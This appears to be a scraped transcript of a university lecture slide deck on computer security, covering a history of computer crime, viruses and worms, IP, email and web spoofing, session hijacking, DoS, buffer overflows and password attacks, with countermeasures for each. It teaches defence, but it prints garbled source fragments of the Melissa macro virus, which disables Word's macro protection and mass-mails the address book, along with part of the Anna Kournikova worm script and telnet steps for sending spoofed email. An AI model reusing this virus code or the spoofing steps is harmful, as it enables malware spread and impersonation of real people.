Computer Security - PowerPoint PPT Presentation

About This Presentation

Computer Security


Computer Security. GSBA (Zurich): MIS Block. Hacking. Sanjay Goel, School of Business, University at Albany. 2. Crisis. Computer Crimes ... – PowerPoint PPT presentation

Number of Views:257
Avg rating:3.0/5.0
Slides: 72
Provided by: gec5
Learn more at:


Transcript and Presenter's Notes

Title: Computer Security

Computer Security
  • GSBA (Zurich) MIS Block
  • Hacking

  • Crisis
  • Computer Crimes
  • Hacker Attacks
  • Modes of Computer Security
  • Password Security
  • Network Security
  • Web Security
  • Distributed Systems Security
  • Database Security

  • Internet has grown very fast and security has
    lagged behind.
  • Legions of hackers have emerged as impedance to
    entering the hackers club is low.
  • It is hard to trace the perpetrator of cyber
    attacks since the real identities are camouflaged
  • It is very hard to track down people because of
    the ubiquity of the network.
  • Large scale failures of internet can have a
    catastrophic impact on the economy which relies
    heavily on electronic transactions

Computer Crime The Beginning
  • In 1988 a "worm program" written by a college
    student shut down about 10 percent of computers
    connected to the Internet. This was the
    beginning of the era of cyber attacks.
  • Today we have about 10,000 incidents of cyber
    attacks which are reported and the number is

Computer Crime - 1994
  • A 16-year-old music student called Richard Pryce,
    better known by the hacker alias Datastream
    Cowboy, is arrested and charged with breaking
    into hundreds of computers including those at the
    Griffiths Air Force base, Nasa and the Korean
    Atomic Research Institute. His online mentor,
    "Kuji", is never found.
  • Also this year, a group directed by Russian
    hackers broke into the computers of Citibank and
    transferred more than 10 million from customers'
    accounts. Eventually, Citibank recovered all but
    400,000 of the pilfered money.

Computer Crime - 1995
  • In February, Kevin Mitnick is arrested for a
    second time. He is charged with stealing 20,000
    credit card numbers. He eventually spends four
    years in jail and on his release his parole
    conditions demand that he avoid contact with
    computers and mobile phones.
  • On November 15, Christopher Pile becomes the
    first person to be jailed for writing and
    distributing a computer virus. Mr Pile, who
    called himself the Black Baron, was sentenced to
    18 months in jail.
  • The US General Accounting Office reveals that US
    Defense Department computers sustained 250,000
    attacks in 1995.

Computer Crime - 1999
  • In March, the Melissa virus goes on the rampage
    and wreaks havoc with computers worldwide. After
    a short investigation, the FBI tracks down and
    arrests the writer of the virus, a 29-year-old
    New Jersey computer programmer, David L. Smith.
  • More than 90 percent of large corporations and
    government agencies were the victims of computer
    security breaches in 1999

Computer Crime - 2000
  • In February, some of the most popular websites in
    the world such as Amazon and Yahoo are almost
    overwhelmed by being flooded with bogus requests
    for data.
  • In May, the ILOVEYOU virus is unleashed and clogs
    computers worldwide. Over the coming months,
    variants of the virus are released that manage to
    catch out companies that didn't do enough to
    protect themselves.
  • In October, Microsoft admits that its corporate
    network has been hacked and source code for
    future Windows products has been seen.

Computer Crime - 2002
  • In April 2002, computer hackers calling
    themselves Deceptive Duo announced that they
    had begun their mission of breaking into computer
    systems to call attention to the vulnerabilities
    in the US National Security
  • In subsequent weeks they hacked into 52 web sites
    and databases including those operated by the US
    office of secretary of defense, the space and
    Naval Warfare Systems Command, The Defense
    Logistics Agency, Sandia National Lab, NASA JPL,
    Airlines, Banks

Intrusion Incident Reports
Note Projected from 3 quarters of data
Why are we vulnerable?
  • Increased complexity of the systems
  • Large networks with switches, hubs, gateways
    provide multiple entry points
  • Very sophisticated software using millions of
    lines of code which leave holes for hackers to
  • Constantly upgrading computer systems and
  • Support staff not able to keep up with security
  • New technology (often not fully tested) adds new
  • Lack of proper education
  • Managers do not realize the vulnerabilities and
    are not willing to invest in technology that does
    not directly effect the bottom line
  • Dependence on commercial software with known
  • e.g. Microsoft Windows OS and Outlook

  • Computer viruses are self-replicating software
    entities that attach themselves parasitically to
    existing programs.
  • The virus spreads by creating replica of itself
    and attaching itself to other executable programs
    to which it has write access.
  • A true virus does not spread from machine to
    machine on its own. It must be passed on to other
    users via e-mail, infected files/diskettes,
    programs or shared files
  • The viruses normally consist of two parts
  • Replicator responsible for copying the virus to
    other executable programs.
  • Payload Action of the virus,which may be benign
    such as printing a weird message, playing music
    or malicious such as destroying data or
    corrupting the hard disk.

  • When a user executes an infected program (an
    executable file or boot sector), the viral
    portion of the code typically executes first and
    then the control returns to the original program,
    which executes normally.
  • Unless the virus executes a payload which the
    user observes the user is not likely to find the
    virus operating on his/her hard drive.
  • Viruses can persist in your programs for a long
    time without being detected thus constantly
    upgrading your virus signatures and running virus
    scans is very important.

  • Polymorphic viruses
  • Viruses which modify themselves prior to
    attaching themselves to another program.
  • These are hard to detect since they are
    constantly changing their signature.
  • Macro Viruses
  • These viruses use an application macro language
    (such as VB or VBScript) to create programs that
    infect documents and templates
  • If an infected document is opened the virus is
    executed and it infects the users application

Melissa Virus
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "M
elissa?") "... by Kwyjibo" End If Set ADI1
ActiveDocument.VBProject.VBComponents.Item(1) Set
NTI1 NormalTemplate.VBProject.VBComponents.Item(
1) NTCL NTI1.CodeModule.CountOfLines ADCL
ADI1.CodeModule.CountOfLines BGN 2 If ADI1.Name
ltgt "Melissa" Then If ADCL gt 0 Then
_ ADI1.CodeModule.DeleteLines 1, ADCL Set
ToInfect ADI1 ADI1.Name "Melissa" DoAD
True End If If NTI1.Name ltgt "Melissa" Then If
NTCL gt 0 Then _ NTI1.CodeModule.DeleteLines 1,
NTCL Set ToInfect NTI1 NTI1.Name
"Melissa" DoNT True End If If DoNT ltgt True And
DoAD ltgt True Then GoTo CYA If DoNT True Then Do
While ADI1.CodeModule.Lines(1, 1)
"" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.Cod
eModule.AddFromString ("Private Sub
Document_Close()") Do While ADI1.CodeModule.Lines(
BGN, 1) ltgt "" ToInfect.CodeModule.InsertLines
BGN, ADI1.CodeModule.Lines(BGN, 1) BGN BGN
1 Loop End If If DoAD True Then Do While
NTI1.CodeModule.Lines(1, 1) "" NTI1.CodeModule.D
eleteLines 1 Loop ToInfect.CodeModule.AddFromStrin
g ("Private Sub Document_Open()") Do While
NTI1.CodeModule.Lines(BGN, 1) ltgt
"" ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1) BGN BGN
1 Loop End If CYA If NTCL ltgt 0 And ADCL 0 And
(InStr(1, ActiveDocument.Name, "Document")
False) Then ActiveDocument.SaveAs
FileNameActiveDocument.FullName ElseIf
(InStr(1, ActiveDocument.Name, "Document") ltgt
False) Then ActiveDocument.Saved True End
If 'WORD/Melissa written by Kwyjibo 'Works in
both Word 2000 and Word 97 'Worm? Macro Virus?
Word 97 Virus? Word 2000 Virus? You Decide! 'Word
-gt Email Word 97 lt--gt Word 2000 ... it's a new
age! If Day(Now) Minute(Now) Then
Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta
here." End Sub
// Melissa Virus Source Code Private Sub
Document_Open() On Error Resume Next If
System.PrivateProfileString("", "HKEY_CURRENT_USER
"Level") ltgt "" Then CommandBars("Macro").Controls(
"Security...").Enabled False System.PrivateProfi
leString("", "HKEY_CURRENT_USER\Software\Microsoft
\Office\9.0\Word\Security", "Level")
1 Else CommandBars("Tools").Controls("Macro").Ena
bled False Options.ConfirmConversions (1 -
1) Options.VirusProtection (1 -
1) Options.SaveNormalPrompt (1 - 1) End If Dim
UngaDasOutlook, DasMapiName, BreakUmOffASlice Set
UngaDasOutlook CreateObject("Outlook.Application
") Set DasMapiName UngaDasOutlook.GetNameSpace("
MAPI") If System.PrivateProfileString("", "HKEY_CU
"Melissa?") ltgt "... by Kwyjibo" Then If
UngaDasOutlook "Outlook" Then DasMapiName.Logon
"profile", "password" For y 1 To
DasMapiName.AddressLists.Count Set
AddyBook DasMapiName.AddressLists(y) x
1 Set BreakUmOffASlice
UngaDasOutlook.CreateItem(0) For oo 1
To AddyBook.AddressEntries.Count Peep
BreakUmOffASlice.Recipients.Add Peep
x x 1 If x gt 50 Then oo
AddyBook.AddressEntries.Count Next oo
BreakUmOffASlice.Subject "Important
Message From " Application.UserName
BreakUmOffASlice.Body "Here is that document
you asked for ... don't show anyone else -)"
BreakUmOffASlice.Send Peep "" Next
y DasMapiName.Logoff End If
  • Worms are a form of self-replicating programs
    that can automatically spread.
  • Unlike the viruses they do not need a carrier
    program and they replicate by spawning copies of
  • They are more complex and are much harder to
    write than the virus programs.
  • ILOVEYOU worm in 2000 automatically emailed
    itself to the first 200 entries in the outlook
    address book
  • The worm spread to 10 million computers in two
    days which were required to create a patch for it
  • It cost billions of dollars to repair the damage
  • Sometimes worms take a long time to spread
  • Anna Kournikova worm was discovered in August
    2000 and became a serious threat in February 2001
  • CodeRed, Nimbda, SirCam are other worms each of
    which cost upwards of 500 million dollars in

Worm (Anna Kournikova)
  • 'Vbs.OnTheFly Created By OnTheFly
  • On Error Resume Next
  • Set WScriptShell CreateObject("WScript.Shell")
  • WScriptShell.regwrite "HKCU\software\OnTheFly\",
    "Worm made with Vbswg 1.50b"
  • Set FileSystemObject Createobject("scripting.fil
  • FileSystemObject.copyfile wscript.scriptfullname,F
  • if WScriptShell.regread ("HKCU\software\OnTheFly\m
    ailed") ltgt "1" then
  • doMail()
  • end if
  • if month(now) 1 and day(now) 26 then
  • "Http//",3,false
  • end if
  • Set thisScript FileSystemObject.opentextfile(wsc
    ript.scriptfullname, 1)
  • thisScriptText thisScript.readall

Trojan Horse
  • This is a program that secretly gets installed on
    a computer planting a secret payload that can
    allow a hacker who planted it access to do things
    such as stealing passwords or recording key
    strokes and transmitting them to a third party
  • A logic bomb is a trojan horse that executes when
    certain conditions become true
  • Most commonly executes at a specific date and
  • Example Cute Trojan Horse allows hackers to
    destroy the firewalls installed on computers.

Why do Hackers Attack?
  • Most hackers try to test the system limitations
    out of intellectual curiosity bragging rights
  • Cyber criminals hack into corporate computers to
    steal money or credit card numbers
  • In March 2001 FBI reported that over 1 million
    credit card numbers were stolen by cyber
    criminals in Russia Ukraine
  • Cyber terrorists try to push their political
    agenda by coercion via computer-based attacks
    against computers and networks
  • NATO computers were blasted with infected emails
    to protest against bombings in Kosovo during the
    1999 conflict
  • Lucent was made target for DOS attacks by a group
    protesting against its business with Israel
  • Disgruntled employees often venting anger at a
    company or organization by hacking stealing
    information or causing damage to computer systems

Types of Hacker Attack
  • Active Attacks
  • Denial of Service
  • Breaking into a site
  • Intelligence Gathering
  • Resource Usage
  • Deception
  • Passive Attacks
  • Sniffing
  • Passwords
  • Network Traffic
  • Sensitive Information
  • Information Gathering

Modes of Hacker Attack
  • Spoofing
  • Session Hijacking
  • Denial of Service Attacks
  • Buffer Overflow Attacks
  • Password Attacks

  • Definition
  • An attacker alters his identity so that some one
    thinks he is some one else
  • Email, User ID, IP Address,
  • Attacker exploits trust relation between user and
    networked machines to gain access to machines
  • Types of Spoofing
  • IP Spoofing
  • Email Spoofing
  • Web Spoofing

IP Spoofing
  • There are three basic flavors of IP spoofing
  • Basic Address Change
  • Use of source routing to intercept packets
  • Exploiting of a trust relationship on UNIX

IP Spoofing Basic Address Change
  • Definition
  • Attacker uses IP address of another computer to
    acquire information or gain access

Replies sent back to
Spoofed Address
From Address To Address
  • Attacker changes his own IP address to spoofed
  • Attacker can send messages to a machine
    masquerading as spoofed machine
  • Attacker can not receive messages from that

Basic Address Change (Windows)
  • Simple Mechanism
  • From start menu select settings ? Control Panel
  • Double click on the network icon
  • Right click the LAN connection and select
  • select Internet Protocol (TCP/IP) and click on
  • Change the IP address to the address you want to
  • Reboot the machine
  • All packets sent from the machine have the
    spoofed address

Basic Address Change (Unix)
  • Use ifconfig command
  • Write Details

IP-Spoofing (Basic Address Change)
  • Limitation
  • Flying Blind Attack i.e. user can not get return
  • Any protocol which requires 3-way connection can
    not be used
  • UDP which is connectionless can be used to send
  • Uses
  • Used in denial-of-service attack where a single
    packet can crash a machine

IP Spoofing Basic Address Change
  • Prevention
  • You can protect your machines from being used to
    launch a spoofing attack
  • You can do little to prevent other people from
    spoofing your address
  • Users can be prevented from having access to
    network configuration
  • To protect your company from spoofing attack you
    can apply basic filters at your routers
  • Ingress Filtering Prevent packets from outside
    coming in with address from inside.
  • Egress Filtering Prevents packets not having an
    internal address from leaving the network

IP Spoofing Source Routing
  • Definition
  • Attacker spoofs the address of another machine
    and inserts itself between the attacked machine
    and the spoofed machine to intercept replies

Attacker intercepts packets as they go to
From Address To Address
Replies sent back to
Spoofed Address
  • The path a packet may change can vary over time

IP Spoofing Source Routing Contd.
  • Attacker uses source routing to ensure that the
    packets pass through certain nodes on the network
  • Loose Source Routing (LSR) The sender specifies
    a list of addresses that the packet must go
    through but it can go to any other address if it
    needs to.
  • Strict Source Routing (SSR) The sender specifies
    the exact path for the packet and the packet is
    dropped if the exact path can not be taken.
  • Source Routing works by using a 39-byte source
    route option field in the IP header
  • Works by picking one node address at a time
  • A maximum of 9 nodes in the path can be specified
  • Source Routing was introduced into the TCP spec
    for debugging and testing redundancy in the

IP Spoofing Source Routing contd.
  • Tracert Windows NT utility runs at a Command
  • Traces a path from your machine to the URL or IP
    address given along with the tracert command.
  • Usage
  • tracert -d -h maximum_hops -j host-list -w
    timeout target_name
  • Options
  • -d Do not resolve addresses to
  • -h maximum_hops Maximum number of hops to
    search for target.
  • -j host-list Loose source route along
  • -w timeout Wait timeout milliseconds for
    each reply.
  • Tracing a URL tracert ltentergt
  • Tracing route to a maximum of 30 hops1 181
    ms 160 ms 170 ms 170 ms 170 ms 160 ms .....

IP Spoofing Source Routing contd.
  • Tracing an IP-Address tracert
  • Tracing using loose source routing tracert j
  • Protection
  • Disable source routing at your routers

IP Spoofing Trust Relationships
  • In UNIX trust relationships can be set up between
    multiple machines
  • After trust becomes established the user can use
    Unix r commands to access sources on different
  • A .rhosts file is set up on individual machines
    or /etc/hosts.equiv is used to set it up at the
    system level
  • Trust relationship is easy to spoof
  • If user realizes that a machine trusts the IP
    address he can spoof that address and
    he is allowed access without password
  • The responses go back to the spoofed machine so
    this is still a flying blind attack.
  • Protection
  • Do not use trust relations
  • Do not allow trust relationships on the internet
    and limit them within the company
  • Monitor which machines and users can have trust
    without jeopardizing critical data or function

Email Spoofing
  • Definition
  • Attacker sends messages masquerading as some one
  • What can be the repercussions?
  • Reasons
  • Attackers want to hide their identity while
    sending messages (sending anonymous emails)
  • User sends email to anonymous e-mailer which
    sends emails to the intended recipient
  • Attacker wants to impersonate someone
  • To get someone in trouble
  • Social engineering
  • Get information by pretending to be someone else

Email Spoofing Similar Name Account
  • Create an account with similar email address
  • A message from this account
    can perplex the students
  • Most mailers have an alias field (this can be
    used to prescribe any name.
  • Example
  • Class
  • I am too sick to come to the class tomorrow so
    the class is cancelled.
  • The assignments that were due are now due next
  • Sanjay Goel

Email Spoofing Similar Name Account
  • Protection
  • Educating the employees in a corporation to be
  • Make sure that the full email address rather than
    alias is displayed
  • Institute policy that all official communication
    be done using company email
  • Use PKI where digital signature of each employee
    is associated with the email

Email Spoofing Mail Client
  • Modify a mail client
  • When email is sent from the user no
    authentication is performed on the from address
  • Attacker can put in any return address he wants
    to in the mail he sends
  • Protection
  • Education
  • Audit Logging
  • Looking at the full email address

Email Spoofing Telnet to Port 25
  • Telnet to port 25
  • Most mail servers use port 25 for SMTP.
  • An attacker runs a port scan and gets the IP
    address of machine with port 25 open
  • telnet ip-adress 25 (cmd to telnet to port 25)
  • Attacker logs on to this port and composes a
    message for the user.
  • Example
  • Hello
  • mail fromspoofed-email-address
  • Rcpt to person-sending-mail-to
  • Data (message you want to send)
  • Period sign at the end of the message

Email Spoofing Telnet to Port 25
  • Mail relaying is the sending of email to a person
    on a different domain
  • Protection
  • Make sure that the recipients domain is the same
    as the the mail server
  • New SMTP servers disallow mail relaying
  • From a remote connection the from and to
    addresses are from the same domain as the mail
  • Make sure that spoofing and relay filters are

Web Spoofing
  • Basic
  • Man-in-the-Middle Attack
  • URL Rewriting
  • Tracking State

Web Spoofing - Basic
  • No requirement against registering a domain
  • Attacker registers a web address matching an
    entity e.g.,,
  • Process
  • Hacker sets up a spoofed site
  • User goes to the spoofed site
  • Clicks on items to order and checks out
  • Site prompts user for credit card information
  • Gives the user a cookie
  • Puts message Site experiencing technical
  • When user tries back spoofed site checks cookie
  • Already has credit card number so directs the
    user to legitimate site

Web Spoofing - Basic
  • Protection
  • Use server side certificates
  • Certificates much harder to spoof
  • Users need to ensure that the certificates are
    legitimate before clicking on OK to accept

Web Spoofing Man in the Middle Attack
  • Man-in-the-Middle Attack
  • Attacker acts as a proxy between the web server
    and the client
  • Attacker has to compromise the router or a node
    through which the relevant traffic flows
  • Protection
  • Secure the perimeter to prevent compromise of

Web Spoofing URL Rewriting
  • URL Rewriting
  • Attacker redirects web traffic to another site
    that is controlled by the attacker
  • Attacker writes his own web site address before
    the legitimate link
  • e.g. ltA hrefhttp//
  • The user is first directed to the hacker site and
    then redirected to the actual site
  • Protections
  • Web browsers should be configured to always show
    complete address
  • Ensure that the code for the web sites is
    properly protected at the server end and during

Web Spoofing
  • Tracking State
  • When a user logs on to a site a persistent
    authentication is maintained
  • This authentication can be stolen for
    masquerading as the user

Tracking State
  • Browsers primarily use Http protocol to
  • Http is a stateless protocol
  • Web Sites need to maintain persistent
    authentication so that user does not have to
    authenticate repeatedly
  • This authentication can be stolen for
    masquerading as the user

Web Spoofing Tracking State
  • Three types of tracking methods are used
  • Cookies Line of text with ID on the users cookie
  • Attacker can read the ID from users cookie file
  • URL Session Tracking An id is appended to all
    the links in the website web pages.
  • Attacker can guess or read this id and masquerade
    as user
  • Hidden Form Elements
  • ID is hidden in form elements which are not
    visible to user
  • Hacker can modify these to masquerade as another

Web Spoofing Tracking State Cookies
  • Cookies are a piece of information that the
    server passes to the browser and the browser
    stores on the server
  • Set of name value pairs
  • Web servers place cookies on user machines with
    id to track the users
  • Two types of cookies
  • Persistent cookies Stored on hard drive in text
  • Non-persistent cookies Stored in memory and goes
    away after you reboot or turn off the machine
  • Attacker gets cookies by
  • Accessing the victim hard drive
  • Guessing Ids which different web servers assign

Web Spoofing Tracking State Cookies
  • Protection
  • Physical protection of hard drives is best
  • Use non-persistent cookies since hacker has to
    access and edit memory to get to it.
  • Use random, hard to guess ID

Web Spoofing Tracking State URL Encoding
  • http// www.address.edu1234/path/subdir/file.ext?
  • Service ? http
  • Host ? www. Address. edu
  • Port ? 1234
  • /path/subdur/file.ext ? resource path on the
  • query_string ? additional information that can
    be passed to resource
  • Http allows name value pairs to be passed to the
  • http// www. test. edu/index.jsp?firstnamesanjay
  • The server can place the id of a customer along
    with the URL
  • http//
  • This number can be obtained by guessing or
    looking over some ones shoulder
  • Timeout for the sessions may be a few hours
  • User can masquerade as the owner of the id and
    transact on the web

Web Spoofing URL Encoding Protection
  • Server Side
  • Use large, hard to guess identifiers
  • Keep the session inactivity time low
  • User Side
  • Make sure that no one is looking over your
    shoulder as you browse
  • Do not leave terminals unattended
  • Use server side certificates
  • A server side certificate is a certificate that
    the server presents to a client to prove identity
  • Users should verify the certificates prior to
    clicking OK on the accept button

Web Spoofing Tracking State Cookies
  • HTML allows creation of hidden fields in the
  • Developers exploit this to store information for
    their reference
  • ID can be stored as a hidden form field
  • ltInput TypeHidden NameSearch Valuekeygt
  • ltInput TypeHidden Nameid Value123429823gt
  • Protection
  • Hard to guess ids
  • Short expiry times

Web Spoofing General Protection
  • Disable JavaScript, ActiveX and other scripting
    languages that execute locally or in the browser
  • Make sure that the browsers location line is
    always visible
  • Educate the users
  • Make hard to guess session ids
  • Use server side certificates
  • A server side certificate is a certificate that
    the server presents to a client to prove identity
  • Users should verify the certificates prior to
    clicking OK on the accept button

Session Hijacking
  • Definition
  • Process of taking over an existing active session
  • Modus Operandi
  • User makes a connection to the server by
    authenticating using his user ID and password.
  • After the users authenticate, they have access to
    the server as long as the session lasts.
  • Hacker takes the user offline by denial of
  • Hacker gains access to the user by impersonating
    the user

Session Hijacking
Bob telnets to Server
Bob authenticates to Server
Hi! I am Bob
  • Attacker can
  • monitor the session
  • periodically inject commands into session
  • launch passive and active attacks from the session

Session Hijacking How Does it Work?
  • Attackers exploit sequence numbers to hijack
  • Sequence numbers are 32-bit counters used to
  • tell receiving machines the correct order of
  • Tell sender which packets are received and which
    are lost
  • Receiver and Sender have their own sequence
  • When two parties communicate the following are
  • IP addresses
  • Port Numbers
  • Sequence Number
  • IP addresses and port numbers are easily
    available so once the attacker gets the server to
    accept his guessed sequence numbers he can hijack
    the session.

Session Hijacking Programs
  • Juggernaut
  • Network sniffer that that can also be used for
  • Get from http//
  • Hunt
  • Can be use to listen, intercept and hijack active
    sessions on a network
  • http//
  • TTY Watcher
  • Freeware program to monitor and hijack sessions
    on a single host
  • http//
  • IP Watcher
  • Commercial session hijacking tool based on TTY
  • http//

Session Hijacking Protection
  • Use Encryption
  • Prevents hacker from intercepting packets
  • Use a secure protocol for sensitive work
  • E.g. administering remote machines
  • Limit incoming connections
  • Minimize remote access
  • Strong authentication ineffective
  • Since the authentication is only done at
    beginning of the session

Denial of Service (DOS) Attack
  • Definition
  • Attack through which a person can render a system
    unusable or significantly slow down the system
    for legitimate users by overloading the system so
    that no one else can use it.
  • Types
  • Crashing the system or network
  • Send the victim data or packets which will cause
    system to crash or reboot.
  • Exhausting the resources by flooding the system
    or network with information
  • Since all resources are exhausted others are
    denied access to the resources
  • Distributed DOS attacks are coordinated denial of
    service attacks involving several people and/or
    machines to launch attacks

Denial of Service (DOS) Attack
  • Types
  • Ping of Death
  • SSPing
  • Land
  • Smurf
  • SYN Flood
  • CPU Hog
  • Win Nuke
  • RPC Locator
  • Jolt2
  • Bubonic
  • Microsoft Incomplete TCP/IP Packet Vulnerability
  • HP Openview Node Manager SNMP DOS Vulnerability
  • Netscreen Firewall DOS Vulnerability
  • Checkpoint Firewall DOS Vulnerability

DOS Attack - Protection
  • Effective robust design
  • Create redundant servers
  • Distribute your servers across different ISPs
  • Bandwidth limitations
  • Limit available band width based on protocol
  • Keep systems patched
  • Prevents attacks where machines are crashed
  • Run the least amount of services
  • Limits the options of the hacker
  • Allow only necessary traffic
  • Prevents hacked machines to be used as launching
  • Block IP addresses
  • Once under attack start blocking IP-addresses at
    the firewall

Buffer Overflow Attacks
  • This attack takes advantage of the way in which
    information is stored by computer programs
  • An attacker tries to store more information on
    the stack than the size of the buffer
  • How does it work?

Buffer Overflow Attacks
  • Programs which do not have a rigorous memory
    check in the code, are vulnerable to this attack
  • Simple weaknesses can be exploited
  • If memory allocated for name is 50 characters,
    someone can break the system by sending a
    fictitious name of more than 50 characters
  • Can be used for espionage, denial of service or
    compromising the integrity of the data
  • Examples
  • NetMeeting Buffer Overflow
  • Outlook Buffer Overflow
  • AOL Instant Messenger Buffer Overflow
  • SQL Server 2000 Extended Stored Procedure Buffer

Buffer Overflow Attacks - Prevention
  • Close port or service
  • Remove vulnerable software
  • Remove software no longer being used
  • Apply vendor patch
  • Update patches as soon as the vendor releases it
  • Filter specific traffic at the firewall
  • Once application is identified stop all requests
    to it
  • Test Key Applications
  • Test software for vulnerabilities
  • Run software in the least privilege required
  • Limits the exploitation capacity of the hacker

Password Attacks
  • A hacker can exploit a weak passwords
    uncontrolled network modems easily
  • Steps
  • Hacker gets the phone number of a company
  • Hacker runs war dialer program
  • If original number is 555-5532 he runs all
    numbers in the 555-55xx range
  • When modem answers he records the phone number of
  • Hacker now needs a user id and password to enter
    company network
  • Companies often have default accounts e.g. temp,
    anonymous with no password
  • Often the root account uses company name as the
  • For strong passwords password cracking techniques

Password Security
Hash Function
Hashed Password
Compare Password
Hashed Password
Stored Password
Allow/Deny Access
  • Password hashed and stored
  • Salt is added to randomize the password and then
    stored on the system
  • Password attacks launched to crack encrypted

Password Attacks - Process
  • Find a valid user ID
  • Create a list of possible passwords
  • Rank the passwords from high probability to low
  • Type in each password
  • If the system allows you in success !
  • If not, try again, being careful not to exceed
    password lockout (the number of times you can
    guess a wrong password before the system shuts
    down and wont let you try any more)

Password Attacks - Types
  • Dictionary Attack
  • Hacker tries all words in dictionary to crack
  • 70 of the people use dictionary words as
  • Brute Force Attack
  • Try all permutations of the letters symbols in
    the alphabet
  • Hybrid Attack
  • Words from dictionary and their variations used
    in attack
  • Social Engineering
  • People write passwords in different places
  • People disclose passwords naively to others
  • Shoulder Surfing
  • Hackers slyly watch over peoples shoulders to
    steal passwords
  • Dumpster Diving
  • People dump their trash papers in garbage which
    may contain information to crack passwords

  • Computer Security is a continuous battle
  • As computer security gets tighter hackers are
    getting smarter
  • Very high stakes
  • Billions of dollars worth of business conducted
    on the internet
Write a Comment
User Comments (0)